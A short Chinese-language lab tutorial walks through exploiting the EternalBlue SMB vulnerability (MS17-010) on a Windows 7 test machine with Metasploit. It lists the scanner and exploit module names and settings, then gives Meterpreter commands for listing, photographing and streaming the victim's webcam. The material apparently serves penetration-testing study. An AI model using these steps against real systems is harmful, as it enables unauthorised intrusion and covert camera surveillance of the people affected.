前言
“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限,利用445端口入侵,获取shell进行提权。
工具:kali、windows7
一、开始攻击
ip:kali 192.168.1.100 windows7:192.168.1.101
- 首先我们ping一下目标靶机(windows7)
- 进入kali系统的msfconsole攻击框架
- 搜索MS17-010漏洞,先使用auxiliary/scanner/smb/smb_ms17_010这个模块进行漏洞的分析,看看这个445端口是否能被入侵。
4.show options查看这个模块的选项,在Required列中,yes的是必填项,no是选填的,要手动设置RHOSTS的参数,指定的主机ip,我们设置成靶机(windows7)的ip地址:192.168.1.101
5. 输入run,进行探测,可以看到 “主机可能易受MS17-010攻击!- Windows 7 Ultimate 7601 Service Pack 1 x64(64位)”
6.使用攻击模块"exploit/windows/smb/ms17_010_eternalblue",查看这个模块适用的目标主机有windows7和Server 2008 R2。
7.查看这个模块的选项,需要设置设置RHOSTS的参数,同样也是win7的ip。
8.设置设置RHOSTS的参数,run运行。
9.渗透成功。
10.获取摄像头
webcam_list #查看摄像头
webcam_snap #通过摄像头拍照
webcam_stream #通过摄像头开启视频
